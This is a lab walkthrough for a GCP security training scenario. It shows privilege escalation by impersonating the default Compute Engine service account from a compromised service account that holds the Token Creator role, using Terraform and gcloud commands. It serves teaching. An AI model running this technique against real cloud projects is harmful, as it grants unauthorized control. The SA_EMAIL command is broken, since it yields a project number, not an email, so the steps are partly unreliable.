Privilege Escalation Using Service account impersonation

In order to start the scenario go to the scenario-6 folder by typing the below command in the shell

cd scenario-6

Export the project ID by typing the below command in the GCLOUD Shell

export PROJECT_ID="project-id"

replace the project-id with your project ID

Next configure the gcloud to use the project by typing the below command in the shell

gcloud config set project $PROJECT_ID

Next initialize the terraform by typing the below command in the shell

terraform init

Next apply the terraform by typing the below command in the shell

terraform apply -auto-approve -var project-id=$PROJECT_ID

Next output the service account key by typing the below command in the shell

terraform output -raw sa-key > creds.json

Scenario Info

According to Google Documentation

A service account is a special kind of account used by an application or a virtual machine (VM) instance, not a person.

One of the coolest feature of the service account is that it can be impersonated by any user/service account in the project if the user/service account has the iam.serviceAccountTokenCreator role in the project. In this scenario we are going to exploit this feature

Whenever we want to impersonate the service account we need to add the iam.ServiceAccountTokenCreator role to the user/service account , but keep in the mind if we add this role at the project level then the user/service account can impersonate any service account in the project.

In this scenario we are going to impersonate the default-compute-engine service account which has the Editor role in the project


This scenario assumes that the attacker has already compromise the service-account which as the iam.serviceAccountTokenCreator

Configure the gcloud to use the service-account by typing the below command in the shell

gcloud auth activate-service-account --key-file=creds.json

Now try to list the buckets in the project by typing the below command in the shell

gsutil ls

You will get an error saying that you don't have permission to list the buckets

Next we are trying to impersonate the default-compute-engine service account which has Editor permission in the project

Export the default-compute-engine service account email by typing the below command in the shell

export SA_EMAIL=$(gcloud projects describe $PROJECT_ID --format="value(projectNumber)")
gcloud config set auth/impersonate_service_account $SA_EMAIL

Now try to list the buckets in the project by typing the below command in the shell

gsutil ls

This time you will be able to list the buckets in the project

Now as the attacker you can do anything in the project as the default-compute-engine service account

Next we are going to unset the impersonated service account by typing the below command in the shell

gcloud config unset auth/impersonate_service_account

Clean up

To clean up the Scenario type the below command in the GCLOUD Shell

terraform destroy -auto-approve -var project-id=$PROJECT_ID